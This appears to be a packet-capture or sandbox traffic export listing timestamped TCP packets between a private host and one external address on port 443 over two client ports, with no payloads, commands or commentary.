Dec 3, 2024 14:28:35.748394966 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.748505116 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.791327000 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.792025089 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.792061090 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.792201996 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.792298079 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.792341948 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.792382956 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.835324049 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.835606098 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.835692883 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.835769892 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.835820913 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.835957050 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.849769115 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.850131035 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850145102 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.850159883 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850227118 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850245953 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850280046 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850306988 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850342035 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850379944 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850384951 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850445032 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.850477934 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.895323992 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.899175882 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899261951 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899542093 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899645090 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899719000 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899777889 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899811983 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899944067 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.899990082 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.900032043 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.943325043 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.943634987 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.943696022 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.943754911 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.943809986 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.943851948 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.972353935 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.972440004 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.972562075 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:35.972589970 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.972657919 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.972794056 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.972853899 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:35.972904921 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.019328117 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.019419909 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.063327074 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.085772038 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.085937977 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.085958958 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.086038113 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.086082935 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.092540026 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.092663050 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.092703104 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.092802048 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.092812061 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.092864037 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093148947 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093198061 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093235970 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093285084 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093331099 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093342066 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.093379021 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132211924 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.132283926 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.132407904 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132440090 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.132685900 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132704973 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.132725954 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132744074 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132766962 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132821083 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132838964 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132884979 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.132895947 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.175334930 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.254029036 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.254147053 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.254189014 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.254281998 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.291620016 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.291821003 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.291889906 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.291941881 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.292057991 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292301893 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292311907 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.292363882 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292398930 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292440891 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292468071 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292498112 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292534113 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292577028 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292582035 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292634964 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.292685032 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.339356899 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.339736938 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.339792967 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.339840889 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.339864016 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.372334957 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.372426033 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.372538090 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.372608900 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.372665882 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.372689009 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.372776031 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.415338039 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.493355036 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.493468046 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.493635893 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.493684053 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.493707895 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.493737936 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.493846893 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.493942976 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.496589899 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.496722937 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.496834040 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.496896029 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.496932983 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.497018099 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.497052908 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.497090101 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.497097969 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.498687029 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.498703957 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499046087 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499053001 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499396086 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499408960 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499469042 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499471903 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499541044 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499551058 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499583006 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499593019 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.499603033 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.499612093 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500201941 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500217915 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500237942 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500245094 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500283003 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500289917 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500319004 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500325918 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500341892 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500346899 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500374079 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500379086 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500382900 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500386000 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500448942 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500458002 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500474930 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500480890 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500528097 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500538111 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500547886 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500556946 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500571012 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500577927 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500586033 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500588894 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500607014 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500616074 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500628948 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500633955 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500646114 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500648022 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500684977 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500695944 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500703096 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500705957 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500725985 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500731945 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500742912 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500745058 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500799894 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500811100 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500817060 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500819921 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500839949 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500845909 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500853062 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500855923 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500874996 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500881910 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500894070 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500900030 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500953913 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500962973 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.500979900 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.500986099 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501024008 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501035929 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501044989 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501049042 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501060009 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501060009 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501065969 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501070976 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501140118 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501148939 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.501169920 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501207113 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501255989 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501290083 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.501331091 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.533730030 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.533756018 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.533907890 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.534013987 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534265041 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534348965 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534404993 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534449100 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534497023 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534519911 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534656048 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.534756899 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.547333002 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.547749043 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.547863960 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.547904968 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.548063040 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.548109055 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.548152924 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.575345993 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.576035023 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.576076984 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.576133013 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.576190948 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.591341019 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.592082977 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.592129946 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.592173100 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.592245102 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.592314005 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.619024038 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.619127989 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.619263887 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.619280100 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.619345903 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.619374037 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.619412899 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.624963045 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.625034094 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.625157118 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.625195026 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.625224113 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.625273943 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.625314951 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.625495911 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.625509977 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.635333061 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.638184071 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638411045 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638458014 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638511896 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638520002 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638537884 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.638582945 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655105114 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.655142069 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.655277967 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.655308962 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655375957 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655507088 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655536890 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655659914 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.655683994 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.679335117 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.679981947 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.680077076 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.680160999 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.680188894 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.680304050 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.680398941 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.699337959 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.699434042 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.699572086 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.699640989 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.699687958 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.699721098 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.727336884 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.728076935 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.728179932 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.728240013 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.728301048 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.728365898 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.740389109 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.740485907 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.740647078 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.740693092 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.742458105 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.742476940 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745404959 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.745491028 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.745608091 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745640039 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.745707989 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745740891 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745816946 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745857954 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.745901108 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.750245094 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.750309944 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.750428915 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.750447035 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.751857042 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.751883030 CET	49861	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.752790928 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.756155968 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756177902 CET	443	49864	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.756232023 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756372929 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756421089 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756428003 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756449938 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756495953 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756501913 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.756536007 CET	49864	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:36.791340113 CET	443	49861	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:36.799343109 CET	443	49864	149.154.167.220	192.168.2.5
